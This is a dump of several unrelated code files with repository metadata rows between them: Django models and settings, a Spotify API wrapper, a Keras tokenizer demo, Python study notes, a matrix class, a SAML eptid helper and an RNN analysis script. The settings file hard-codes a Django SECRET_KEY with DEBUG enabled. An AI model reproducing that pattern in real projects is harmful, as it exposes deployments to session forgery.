# Oracle instance table. Configuration fields are being added gradually.
class Oracle_Instance(models.Model):
    # Role of the instance within its cluster
    DB_ROLE = (
        (u"单库", u"单库"),
        (u"主库", u"主库"),
        (u"从库", u"从库"),
        (u"汇总", u"汇总")
    )
    # Operational status of the instance
    DB_STATUS = (
        (u"使用中", u"使用中"),
        (u"未使用", u"未使用"),
        (u"故障", u"故障"),
        (u"其它", u"其它"),
    )
    # Database tag / identifier
    dbtag = models.CharField(max_length=50, verbose_name=u"数据库标志", blank=True, null=True)
    # NOTE(review): "vist_ip" looks like a typo for "visit_ip"; renaming
    # would require a schema migration, so it is only flagged here.
    vist_ip = models.GenericIPAddressField(verbose_name=u"访问VIP", max_length=15)
    # Management IP
    m_ip = models.GenericIPAddressField(verbose_name=u"管理IP", max_length=15)
    # Other IPs, comma separated
    other_ip = models.CharField(max_length=150, verbose_name=u"其他IP,逗号隔开")
    # Listener port, Oracle default 1521
    port = models.IntegerField(verbose_name=u"端口", default=1521)
    sid = models.CharField(verbose_name=u"SID", max_length=8, blank=True, null=True)
    # Data centre / machine room
    idc = models.CharField(verbose_name=u"机房", max_length=18, blank=True, null=True)
    # Owning cluster (field name is unconventionally upper case)
    CLUSTER = models.ForeignKey(OracleCluster, verbose_name=u"所属集群", on_delete=models.SET_NULL, null=True, blank=True)
    role = models.CharField(verbose_name=u"DB角色", choices=DB_ROLE, max_length=30, null=True, blank=True)
    db_status = models.CharField(verbose_name=u"DB状态", choices=DB_STATUS, max_length=30, null=True, blank=True)
    # Allocated memory, free-form string
    memory = models.CharField(u"分配内存", max_length=30, null=True, blank=True)
    # Disk location(s)
    disk = models.CharField(u"磁盘位置", max_length=200, null=True, blank=True)
    # Free-form notes
    memo = models.TextField(u"备注信息", max_length=200, null=True, blank=True)

    def __unicode__(self):
        return self.dbtag

    class Meta:
        db_table = 'Oracle_Instance'
        verbose_name = 'Oracle集群一个实例'
        verbose_name_plural = 'Oracle集群一个实例'
"flc009@163.com"
] | flc009@163.com |
3a349a33e9e4531c9a6cddd12c53e9f0b04d76cf | e592f12040848bedbe6ffe309cceb757366d1887 | /Spotify_main.py | caf867bcdd3b05c8dbc58e7780a1c9cffd8349ef | [] | no_license | Hadryan/Spotify_music_recommender-1 | 02a3f0e1b8545f99643bbc9ee72dd2869366d5c1 | dcaf6a518c29f7c12062fc7bc8e143d8edc9d588 | refs/heads/main | 2023-03-05T21:49:59.022693 | 2021-02-10T05:18:32 | 2021-02-10T05:18:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,582 | py | # -*- coding: utf-8 -*-
"""
Created on Mon Feb 8 15:43:03 2021
@author: Victor
"""
import Spotify_Authorization
import spotipy
import pandas as pd
class Spotify_app():
    """Wrapper around a spotipy client that collects track metadata and
    audio features into pandas DataFrames with a common column layout.

    The fetch methods (artist_toptracks, album, track, playlist) accumulate
    per-track fields into instance scratch lists, merge them with audio
    features via get_full_data(), then reset the lists with clean_lists().
    """

    def __init__(self):
        # Authorised spotipy client
        self.auth = Spotify_Authorization.auth()
        self.spotify = spotipy.Spotify(auth_manager=self.auth)
        # Scratch lists filled by the fetch methods and reset between calls
        self.ids = []
        self.artists = []
        self.explicit = []
        self.name = []
        self.pop = []
        self.rel_date = []

    def clean_lists(self):
        # Reset all scratch lists so consecutive fetches do not accumulate
        self.ids.clear()
        self.artists.clear()
        self.explicit.clear()
        self.name.clear()
        self.pop.clear()
        self.rel_date.clear()

    def artist_toptracks(self, artist_id):
        # Fetch the artist's top tracks and return them as a full DataFrame
        artist = self.spotify.artist_top_tracks(artist_id)
        for i in artist['tracks']:
            self.artists.append(([x['name'] for x in i['artists']]))
            # Encode the explicit flag as 0/1
            if i['explicit'] == False:
                self.explicit.append(0)
            else:
                self.explicit.append(1)
            self.name.append(i['name'])
            self.pop.append(i['popularity'])
            self.ids.append(i['id'])
            # Release date requires an extra per-track lookup
            self.rel_date.append(self.spotify.track(i['id'])['album']['release_date'])
        # Year is the first four characters of the release date
        year = [d[:4] for d in self.rel_date]
        audio_features = self.get_audio_features(self.ids)
        rest = pd.DataFrame(list(zip(self.explicit, self.artists, self.name, self.rel_date, year, self.pop)))
        self.clean_lists()
        return self.get_full_data(rest, audio_features)

    def album(self, album_id):
        # Fetch all tracks of an album and return them as a full DataFrame.
        # Album track items do not carry popularity/release_date, so each
        # track is looked up individually.
        album = self.spotify.album_tracks(album_id)
        for i in album['items']:
            self.artists.append([x['name'] for x in i['artists']])
            if (i['explicit']) == False:
                self.explicit.append(0)
            else:
                self.explicit.append(1)
            self.name.append(i['name'])
            self.pop.append(self.spotify.track(i['id'])['popularity'])
            self.rel_date.append(self.spotify.track(i['id'])['album']['release_date'])
            self.ids.append(i['id'])
        year = [d[:4] for d in self.rel_date]
        audio_features = self.get_audio_features(self.ids)
        rest = pd.DataFrame(list(zip(self.explicit, self.artists, self.name, self.rel_date, year, self.pop)))
        self.clean_lists()
        return self.get_full_data(rest, audio_features)

    def track(self, track_id):
        # Fetch a single track and return it as a one-row full DataFrame
        track = self.spotify.track(track_id)
        self.artists.append([i['name'] for i in track['artists']])
        if track['explicit'] == False:
            self.explicit.append(0)
        else:
            self.explicit.append(1)
        self.name.append(track['name'])
        self.pop.append(track['popularity'])
        self.ids.append(track['id'])
        self.rel_date.append(track['album']['release_date'])
        year = [d[:4] for d in self.rel_date]
        audio_features = self.get_audio_features(self.ids)
        rest = pd.DataFrame(list(zip(self.explicit, self.artists, self.name, self.rel_date, year, self.pop)))
        self.clean_lists()
        return self.get_full_data(rest, audio_features)

    def get_artist_id(self, artist_name):
        # Search for artists by name; returns a DataFrame of candidate
        # matches with columns id / Artist Name / Genres
        dummy = []
        search = self.spotify.search(q=artist_name, type='artist')
        for i in search['artists']['items']:
            dummy.append([i['id'], i['name'], i['genres']])
        artist_id = pd.DataFrame(dummy)
        artist_id.columns = ['id', 'Artist Name', 'Genres']
        return artist_id

    def get_track_id(self, track_name):
        # Search for tracks by name; returns a DataFrame of candidate
        # matches with columns Song name / Artists / id
        dummy = []
        search = self.spotify.search(q=track_name, type='track')
        for i in search['tracks']['items']:
            dummy.append([i['name'], [j['name'] for j in i['artists']], i['id']])
        track_id = pd.DataFrame(dummy)
        track_id.columns = ['Song name', 'Artists', 'id']
        return track_id

    def get_audio_features(self, ids):
        # Fetch audio features for each track id, dropping non-numeric
        # metadata keys, and return them as a DataFrame.
        # NOTE(review): one API call is made per id; spotipy's
        # audio_features accepts a list, so batching may be possible -
        # confirm against the spotipy docs before changing.
        # NOTE(review): `index` is only assigned inside the loop, so an
        # empty ids list would raise NameError at audio_features.columns.
        val = []
        for music_id in ids:
            audio = self.spotify.audio_features(music_id)
            [audio[0].pop(k) for k in ['type', 'uri', 'track_href', 'analysis_url', 'time_signature']]
            val.append([i for i in audio[0].values()])
            index = [i for i in audio[0].keys()]
        audio_features = pd.DataFrame(val)
        audio_features.columns = index
        return audio_features

    def get_full_data(self, remain, audio_features):
        # Name the metadata columns, join them with the audio features and
        # reorder to the canonical column layout
        remain.columns = ['explicit', 'artists', 'name', 'release_date', 'year', 'popularity']
        data = pd.concat([audio_features, remain], axis=1)
        cols = ['acousticness', 'artists', 'danceability', 'duration_ms', 'energy', 'explicit', 'id', 'instrumentalness', 'key', 'liveness', 'loudness', 'mode', 'name', 'popularity', 'release_date', 'speechiness', 'tempo', 'valence', 'year']
        data = data[cols]
        return data

    def playlist(self, playlist_id):
        # Fetch all tracks of a playlist and return them as a full DataFrame
        pl = self.spotify.playlist_tracks(playlist_id=playlist_id)
        for i in pl['items']:
            self.artists.append([x['name'] for x in i['track']['artists']])
            if i['track']['explicit'] == False:
                self.explicit.append(0)
            else:
                self.explicit.append(1)
            self.name.append(i['track']['name'])
            self.pop.append(i['track']['popularity'])
            self.rel_date.append(i['track']['album']['release_date'])
            self.ids.append(i['track']['id'])
        year = [d[:4] for d in self.rel_date]
        audio_features = self.get_audio_features(self.ids)
        rest = pd.DataFrame(list(zip(self.explicit, self.artists, self.name, self.rel_date, year, self.pop)))
        self.clean_lists()
        return self.get_full_data(rest, audio_features)

    def related_artists(self, artist_name):
        # Look up artists related to the first search match for artist_name.
        # NOTE(review): unlike the other lookup helpers, the returned
        # DataFrame columns are left unnamed (0: name, 1: id) - naming them
        # would be more consistent but would change the output.
        related_artists = []
        artist_id = self.get_artist_id(artist_name).iloc[0, 0]
        search = self.spotify.artist_related_artists(artist_id)
        for i in search['artists']:
            related_artists.append([i['name'], i['id']])
        return pd.DataFrame(related_artists)
| [
"noreply@github.com"
] | Hadryan.noreply@github.com |
07aebc8436388522c9187ba82736dcfd7ad184a5 | a142b049668648f5a3ffb4714a9d472ff9f5e5e8 | /keras1/keras51_Tokenizer.py | f3f733838bea78c799af6bc85922b82620ebdf72 | [] | no_license | yunnyisgood/Tensorflow | 237944a3251b608bd688f1096618e55317265037 | 6af04eca3c51815509e53d65d03e471177b9e02f | refs/heads/main | 2023-08-09T14:35:28.939447 | 2021-09-13T14:02:20 | 2021-09-13T14:02:20 | 384,322,092 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 830 | py | from tensorflow.keras.preprocessing.text import Tokenizer
from tensorflow.keras.utils import to_categorical
# Sample sentence in Korean (roughly: "I really ate very tasty rice, really greedily").
text = '나는 진짜 매우 맛있는 밥을 진짜 마구 마구 먹었다.'
# Build the word -> index vocabulary; fit_on_texts expects a list of texts.
token = Tokenizer()
token.fit_on_texts([text])
print(token.word_index)
# {'진짜': 1, '마구': 2, '나는': 3, '매우': 4, '맛있는': 5, '밥을': 6, '먹었다': 7}
# Encode the sentence as its sequence of vocabulary indices.
x = token.texts_to_sequences([text])
print(x)
# [[3, 1, 4, 5, 6, 1, 2, 2, 7]]
word_size = len(token.word_index)
print(word_size) # 7
print(type(x))
# One-hot encode the indices; the width is word_size + 1 (index 0 unused by
# the tokenizer), which matches the (1, 9, 8) shape shown below.
x = to_categorical(x)
print(x)
print(x.shape)
'''
[[[0. 0. 0. 1. 0. 0. 0. 0.]
[0. 1. 0. 0. 0. 0. 0. 0.]
[0. 0. 0. 0. 1. 0. 0. 0.]
[0. 0. 0. 0. 0. 1. 0. 0.]
[0. 0. 0. 0. 0. 0. 1. 0.]
[0. 1. 0. 0. 0. 0. 0. 0.]
[0. 0. 1. 0. 0. 0. 0. 0.]
[0. 0. 1. 0. 0. 0. 0. 0.]
[0. 0. 0. 0. 0. 0. 0. 1.]]]
(1, 9, 8)
''' | [
"cyeon0801@gmail.com"
] | cyeon0801@gmail.com |
4149763b5973c1df83a28fbbfac81d7ff11885af | 7fdf4c04baed5f429110045d555e384dc71e08f1 | /python/modules.py | 3e63a5694605d15b25b2648b1729092cf52fa80b | [] | no_license | andrsj/Python-Edu | 8f3d336fc35c325ca546fb508d49f7ee892b5b7d | a2f09876b977f071ff11576ad987af477b0889c6 | refs/heads/master | 2021-03-18T22:20:27.854983 | 2020-04-23T18:05:04 | 2020-04-23T18:05:04 | 247,105,092 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,574 | py | # MODULES
m.__dict__ # Module attributes (the module's namespace dictionary)
m.__doc__ # Doc
m.__name__ # Name
m.__file__ # File
m.__path__ # Path
# module: spam.py
__all__ = [ ‘bar’, ‘Spam’ ]
# These names will be imported by `from spam import *`
# Check whether the module was run as a program
if __name__ == "__main__":
pass
else:
    # The file was imported as a module
pass
# Copy
copy()
deepcopy()
# sys
sys.float_info
sys.maxsize
sys.path
# sys.stdout | sys.stdin | sys.stderr — the standard I/O streams
# Decimal
import decimal
x = decimal.Decimal("3.4")
y = decimal.Decimal("4.5")
a = x * y # a = decimal.Decimal(‘15.30’)
b = x / y # b = decimal.Decimal(‘0.7555555555555555555555555556’)
decimal.getcontext().prec = 3
c = x * y # c = decimal.Decimal(‘15.3’)
d = x / y # d = decimal.Decimal(‘0.756’)
a = decimal.Decimal(42) # Створить Decimal("42")
b = decimal.Decimal("37.45") # Створить Decimal("37.45")
c = decimal.Decimal((1,(2,3,4,5),-2)) # Створить Decimal("-23.45")
d = decimal.Decimal("Infinity")
e = decimal.Decimal("NaN")
x.exp()
x.ln()
x.log10()
x.sqrt()
# Fractions
>>> f = fractions.Fraction(3,4)
>>> f
Fraction(3, 4)
>>> g = fractions.Fraction(“1.75”)
>>> g
Fraction(7, 4)
>>> h = fractions.Fraction.from_float(3.1415926)
Fraction(3537118815677477, 1125899906842624)
>>>
# Datetime
import datetime
x = datetime.datetime.now()
print(x)
print(x.strftime("%_"))
VVVVVVVVVVVVVVVVVVVVVVVV
%a Weekday, short version Wed
%A Weekday, full version Wednesday
%w Weekday as a number 0-6, 0 is Sunday 3
%d Day of month 01-31 31
%b Month name, short version Dec
%B Month name, full version December
%m Month as a number 01-12 12
%y Year, short version, without century 18
%Y Year, full version 2018
%H Hour 00-23 17
%I Hour 00-12 05
%p AM/PM PM
%M Minute 00-59 41
%S Second 00-59 08
%f Microsecond 000000-999999 548513
%z UTC offset +0100
%Z Timezone CST
%j Day number of year 001-366 365
%U Week number of year, Sunday as the first day of week, 00-53 52
%W Week number of year, Monday as the first day of week, 00-53 52
%c Local version of date and time Mon Dec 31 17:41:00 2018
%x Local version of date 12/31/18
%X Local version of time 17:41:00
%% A % character % | [
"61803449+andrsj@users.noreply.github.com"
] | 61803449+andrsj@users.noreply.github.com |
052f814055a4ea1b0c87f9a67983858539c629f3 | 781e2692049e87a4256320c76e82a19be257a05d | /all_data/exercism_data/python/matrix/03621ea5957641a2ad11d0d2303103e5.py | 5c1164e155a96298fac1d2fac55d3c2c202a80e4 | [] | no_license | itsolutionscorp/AutoStyle-Clustering | 54bde86fe6dbad35b568b38cfcb14c5ffaab51b0 | be0e2f635a7558f56c61bc0b36c6146b01d1e6e6 | refs/heads/master | 2020-12-11T07:27:19.291038 | 2016-03-16T03:18:00 | 2016-03-16T03:18:42 | 59,454,921 | 4 | 0 | null | 2016-05-23T05:40:56 | 2016-05-23T05:40:56 | null | UTF-8 | Python | false | false | 1,857 | py | class Matrix:
def __init__(self, data):
"""Create a matrix object and fill it with the provided data.
The data must be the matrix in ASCII format, with embedded newlines,
e.g. '1 2 3\n4 5 6'.
"""
self.height = 0
self.width = 0
self._data = []
for row in data.split("\n"):
self.height += 1
row_values = [int(v) for v in row.strip().split()]
if not self.width:
self.width = len(row_values)
elif self.width != len(row_values):
raise ValueError(
"Row %d has an unexpected number of values" % self.height)
self._data.extend(row_values)
@property
def rows(self):
"""A list of matrix rows."""
return [
self._data[row*self.width : (row+1)*self.width]
for row in xrange(0, self.height)
]
@property
def columns(self):
"""A list of matrix columns."""
return [
self._data[column :: self.width]
for column in xrange(0, self.width)
]
def _data_index(self, column, row):
if row < 0 or row > self.height:
raise IndexError("Row %d does not exist" % row)
if column < 0 or column > self.width:
raise IndexError("Column %d does not exist" % column)
return column + row * self.width
def get(self, column, row):
"""Returns the value from the matrix at coordinate (column, row)."""
return self._data[self._data_index(column, row)]
def set(self, column, row, value):
"""Set the value for the matrix at coordinate (column, row)."""
self._data[self._data_index(column, row)] = value
def sum(self):
"""Returns the sum of all values in the matrix."""
return sum(self._data)
| [
"rrc@berkeley.edu"
] | rrc@berkeley.edu |
77c0e37ed35697f5c5bdcd4b5739f3cce73b4472 | ffd0603413ec537e14f977196b564f4523e29545 | /mysite/mysite/settings.py | 0fa56d38541987273f522ac81761da22f61ab163 | [] | no_license | sorwarduet/blog_project_new | 3b58d407c22bf3f4fbfe796356cc073082f80c9a | 98c37fb474860971dc28a5a1730826d31c9d6f6c | refs/heads/master | 2021-08-23T11:53:14.324873 | 2017-12-04T20:07:05 | 2017-12-04T20:07:05 | 113,047,510 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,331 | py | """
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 1.11.2.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
# BASE_DIR resolves to the repository root (two levels above this file).
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# App-local template/static folders; wired into TEMPLATES['DIRS'] and
# STATICFILES_DIRS below.
TEMPLATE_DIR=os.path.join(BASE_DIR,'blog/templates/blog')
STATIC_DIR=os.path.join(BASE_DIR,'blog/static')
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to version control; rotate it and load
# it from the environment before any real deployment.
SECRET_KEY = 'g50b-v83-g_4yd8$lmtqx4%!xeg-s4)8z(i0694ku0*dxtaj3^'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    # project-local app
    'blog',
]
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [TEMPLATE_DIR,],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
# Development database: a SQLite file in the project root.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
# collectstatic output directory
STATIC_ROOT=os.path.join(BASE_DIR,'static')
# django.contrib.auth redirects here after a successful login
LOGIN_REDIRECT_URL='/'
STATICFILES_DIRS=[
    STATIC_DIR,
]
"esorwar.cse@gmail.com"
] | esorwar.cse@gmail.com |
50a976545023e2867694a4b0470c533b5ec610fb | a1794eabcc58e65cf49087c846a8cf1e7ee83941 | /desktop/core/ext-py/pysaml2-2.4.0/src/saml2/eptid.py | b2551b44f6ce3ae5220ca03de959043a020dbc10 | [
"Apache-2.0"
] | permissive | BelieveDjango/hue | 22502a5f250d5df4c3adc1afa2e3b659e8888089 | d6cbec42d8bcb1e9c0f729b5a22a38abb2c6dee4 | refs/heads/master | 2023-08-31T01:20:23.906783 | 2016-05-19T23:51:28 | 2016-05-19T23:51:28 | 59,281,298 | 0 | 0 | Apache-2.0 | 2023-08-11T05:06:18 | 2016-05-20T09:16:05 | Python | UTF-8 | Python | false | false | 1,368 | py | # An eduPersonTargetedID comprises
# the entity name of the identity provider, the entity name of the service
# provider, and a opaque string value.
# These strings are separated by "!" symbols. This form is advocated by
# Internet2 and may overtake the other form in due course.
import hashlib
import shelve
import logging
logger = logging.getLogger(__name__)
class Eptid(object):
    """Generates and caches persistent eduPersonTargetedID values.

    An eptid has the form "<idp>!<sp>!<hash>", where the hash is an MD5
    over the user-specific args, the SP entity id and a local secret, so
    the same user gets a stable but opaque identifier per SP.
    """

    def __init__(self, secret):
        self._db = {}  # maps "<sp>__<userid>" (utf-8 bytes) -> eptid string
        self.secret = secret

    def make(self, idp, sp, args):
        """Compute the eptid string for (idp, sp, args)."""
        md5 = hashlib.md5()
        # Hash the user args, then the SP id, then the local secret — same
        # order as before.  Everything is UTF-8 encoded first: the original
        # called update() on raw str for sp/secret, which raises TypeError
        # on Python 3.  (A stray no-op md5.digest() call was also removed.)
        for part in list(args) + [sp, self.secret]:
            if not isinstance(part, bytes):
                part = part.encode("utf-8")
            md5.update(part)
        hashval = md5.hexdigest()
        return "!".join([idp, sp, hashval])

    def __getitem__(self, key):
        return self._db[key]

    def __setitem__(self, key, value):
        self._db[key] = value

    def get(self, idp, sp, *args):
        # key is a combination of sp_entity_id and object id
        key = ("__".join([sp, args[0]])).encode("utf-8")
        try:
            return self[key]
        except KeyError:
            val = self.make(idp, sp, args)
            self[key] = val
            return val
class EptidShelve(Eptid):
    # Same behaviour as Eptid, but the id cache is persisted on disk.
    def __init__(self, secret, filename):
        Eptid.__init__(self, secret)
        # writeback=True caches mutated entries in memory and flushes them
        # on sync()/close().
        self._db = shelve.open(filename, writeback=True)
| [
"erickt@cloudera.com"
] | erickt@cloudera.com |
0ac1d93bb67a120a72ecf7874363b5562af9dee2 | cdd499a39bc4c5152ade3b106abf0eddfea2a133 | /analysis.py | 691bec189d8b79e88a843ea347462c50ddaefefc | [] | no_license | joel99/illusions | 307f7f7b94061ad67ca90702529e64cc49fc21e5 | 3f4adeebc38e94ef15a1b6f169754a3274319c3a | refs/heads/main | 2023-04-29T21:16:23.418173 | 2021-05-05T00:00:36 | 2021-05-05T00:00:36 | 352,145,024 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 7,524 | py | #%%
from pathlib import Path
import os.path as osp
from yacs.config import CfgNode as CN
import matplotlib.pyplot as plt
from PIL import Image
import torch
import torch.nn.functional as F
from config.default import get_config
from model import SaccadingRNN
from dataset import UniformityDataset
# --- Experiment selection -------------------------------------------------
# Scratch history of runs: each `config`/`version` assignment below overrides
# the previous one, so only the LAST uncommented pair takes effect
# (currently pdi_fourier_noise_random.yaml, version 0).
seed = 0
config = './config/base.yaml'
config = './config/debug.yaml'
# config = './config/debug2.yaml'
# config = './config/base.yaml'
# config = './config/base_e2e.yaml'
config = './config/large.yaml'
config = './config/large_adv.yaml'
version = 5
version = 0
version = 2
config = './config/large_adv_sin.yaml'
version = 4
config = './config/large_sin.yaml'
# version = 18
version = 19
# config = './config/snakes_slow.yaml'
# version = 0
# version = 2
# version = 3
config = './config/snakes.yaml'
version = 9
config = './config/snakes_large.yaml'
version = 0
config = './config/snakes_cifar.yaml'
version = 6
# TODO add state_dict
config = './config/snakes_ssim.yaml'
version = 3
config = './config/pdi.yaml'
version = 0
# version = 3
config = './config/pdi_polar.yaml'
version = 7
config = './config/circ.yaml'
version = 0
config = './config/troxler_batch_clean.yaml'
config = './config/troxler_batch.yaml'
version = 0
# config = './config/pdi_fourier.yaml'
# config ='./config/pdi_fourier_noise.yaml'
# config = './config/pdi_fourier_random.yaml'
config = './config/pdi_fourier_noise_random.yaml'
version = 0 # Overfit
# version = 2 # Generalization
variant = osp.split(config)[1].split('.')[0]
config = get_config(config)
# Locate the lightning run directory for this variant/seed and load the
# (assumed single) checkpoint saved under the chosen version, onto CPU.
root = Path(f'runs/{variant}-{seed}/lightning_logs/')
# * This is the default output, if you want to play around with a different checkpoint load it here.
model_ckpt = list(root.joinpath(f"version_{version}").joinpath('checkpoints').glob("*"))[0]
weights = torch.load(model_ckpt, map_location='cpu')
model = SaccadingRNN(config)
model.load_state_dict(weights['state_dict'])
model.eval()
if config.TASK.NAME == 'UNIFORMITY':
    dataset = UniformityDataset(config, split="train")
else:
    # Bug fix: this branch referenced a misspelled `UniformistyDataset`,
    # which raised NameError for every non-UNIFORMITY task.
    dataset = UniformityDataset(config, split="train", dataset_root=f'./data/{config.TASK.NAME}', augment=['rotate'])
# dataset = UniformityDataset(config, split="test", dataset_root=f'./data/{config.TASK.NAME}')
# `index` selects which sample to inspect; the commented values are history.
index = 0
# index = 2
# index = 9
# index = 25000
# index = 700
# index = 750
# index = 800
image = dataset[index]
proc_view = UniformityDataset.unpreprocess(image).permute(1, 2, 0)
proc_view = proc_view.squeeze(-1)
plt.imshow(proc_view)
# Generate a length-50 saccade sequence and run the model's predictive rollout.
sac_length = 50
saccades = model._generate_saccades(image, length=sac_length)[:, :1]
all_views, noised_views, patches, state = model.predict_with_saccades(image, saccades, mode='predictive_patch')
# Note, simply using saccades twice in a row is OOD.
# all_views, noised_views, patches, state = model.predict(image)
# Hm, doesn't seem to matter.... am I looking at the right output?
# Why is my loss higher than reported?
print(all_views.size(), patches.size())
# NOTE(review): the single-step loss below is immediately overwritten by the
# full-sequence loss; the first assignment is dead.
loss1 = F.mse_loss(all_views[1], patches[0])
loss1 = F.mse_loss(all_views[1:], patches)
print(loss1)
print(saccades.float().mean())
plt.imshow(image.squeeze(0))
plt.axis('off')
# Wow, there's barely any loss... what gives?
# losses = [F.mse_loss(all_views[i+1], patches[i]) for i in range(49)]
# plt.plot(losses)
#%%
# It don't even look like the right image.
# Side-by-side comparison: ground-truth view vs predicted patch at a few steps.
times = [0, 10, 20, 30]
f, axes = plt.subplots(len(times), 2, sharex=True, sharey=True)
for i, t in enumerate(times):
    # The offset aligns all_views (longer) with patches — presumably the
    # difference is warm-up steps; TODO confirm against predict_with_saccades.
    true_image = all_views[t + all_views.size(0) - patches.size(0), 0]
    # true_image = noised_views[t + all_views.size(0) - patches.size(0), 0]
    proc_true = UniformityDataset.unpreprocess(true_image).permute(1, 2, 0)
    proc_true = proc_true.squeeze(-1)
    # axes[i, 0].imshow(proc_true[..., 2])
    axes[i, 0].imshow(proc_true)
    pred_image = patches[t, 0]
    print(F.mse_loss(true_image, pred_image)) # how can my average in the previous timestep be lower than all my samples here?
    proc_pred = UniformityDataset.unpreprocess(pred_image).permute(1, 2, 0)
    proc_pred = proc_pred.squeeze(-1)
    # axes[i, 1].imshow(proc_pred[..., 2])
    axes[i, 1].imshow(proc_pred)
axes[0, 0].set_title('True')
axes[0, 1].set_title('Pred')
plt.savefig('test.png')
#%%
import numpy as np
# Decode a patch at a step x step grid of locations from the final saccade
# state, then stitch the patches into a padded full-image "belief" map.
step = 3
grid_h = np.linspace(0, image.size(-2)-1, step)
grid_w = np.linspace(0, image.size(-1)-1, step)
grid_x, grid_y = np.meshgrid(grid_h, grid_w)
grid = torch.stack([torch.tensor(grid_x), torch.tensor(grid_y)], dim=-1).long()
grid = grid.flatten(0, 1)
step_state = state.expand(grid.size(0), -1, -1)
patches = model._predict_at_location(step_state, grid.unsqueeze(1), mode='patch').detach()
print(patches.size())
# Assemble patches
# Pad by half the field of view so edge patches fit inside the canvas.
w_span, h_span = model.cfg.FOV_WIDTH // 2, model.cfg.FOV_HEIGHT // 2
padded_image = F.pad(image.squeeze(0), (w_span, w_span, h_span, h_span))
belief = torch.zeros_like(padded_image).detach()
# Pad image
for patch, loc in zip(patches, grid):
    belief[
        loc[0]: loc[0] + 2 * w_span,
        loc[1]: loc[1] + 2 * h_span
    ] = patch
f, axes = plt.subplots(1, 2, sharex=True, sharey=True)
print(saccades.size()) # ! I think there's a transpose happening
axes[0].scatter(*(saccades.T + w_span), color='white')
# Flip direction since saccade higher = matrix lower
axes[0].imshow(padded_image, origin='lower')
axes[0].set_title('True')
axes[0].axis('off')
axes[1].imshow(belief, origin='lower')
axes[1].set_title('Perceived')
axes[1].axis('off')
plt.savefig('test.png', dpi=300)
# %%
#%%
plt.imshow(image.squeeze(0))
plt.savefig('test.png', dpi=300)
#%%
# Same belief-stitching as the cell above, but comparing the saccading state
# against a fixation-only state (no saccades), each decoded on a 3x3 grid.
all_views, noised_views, patches, state = model.predict_with_saccades(image, saccades, mode='predictive_patch')
fixate_saccades = model._generate_saccades(image, mode='fixate')
all_views, noised_views, patches, fixate_state = model.predict_with_saccades(image, fixate_saccades, mode='predictive_patch', initial_state=None)
# all_views, noised_views, patches, fixate_state = model.predict_with_saccades(image, fixate_saccades, mode='predictive_patch', initial_state=state)
step = 3
grid_h = np.linspace(0, image.size(-2), step)
grid_w = np.linspace(0, image.size(-1), step)
grid_x, grid_y = np.meshgrid(grid_h, grid_w)
grid = torch.stack([torch.tensor(grid_x), torch.tensor(grid_y)], dim=-1).long()
grid = grid.flatten(0, 1)
step_state = state.expand(grid.size(0), -1, -1)
step_fixate = fixate_state.expand(grid.size(0), -1, -1)
patches = model._predict_at_location(step_state, grid, mode='patch').detach()
fixate_patches = model._predict_at_location(step_fixate, grid, mode='patch').detach()
# Assemble patches
w_span, h_span = model.cfg.FOV_WIDTH // 2, model.cfg.FOV_HEIGHT // 2
padded_image = F.pad(image.squeeze(0), (w_span, w_span, h_span, h_span))
belief = torch.zeros_like(padded_image).detach()
fixate_belief = torch.zeros_like(padded_image).detach()
# Pad image
for patch, fixate_patch, loc in zip(patches, fixate_patches, grid):
    belief[
        loc[0]: loc[0] + 2 * w_span,
        loc[1]: loc[1] + 2 * h_span
    ] = patch
    fixate_belief[
        loc[0]: loc[0] + 2 * w_span,
        loc[1]: loc[1] + 2 * h_span
    ] = fixate_patch
f, axes = plt.subplots(1, 3, sharex=True, sharey=True)
axes[1].scatter(*(saccades.T + w_span), color='white')
axes[0].imshow(padded_image)
axes[0].set_title('True')
axes[0].axis('off')
axes[1].imshow(belief)
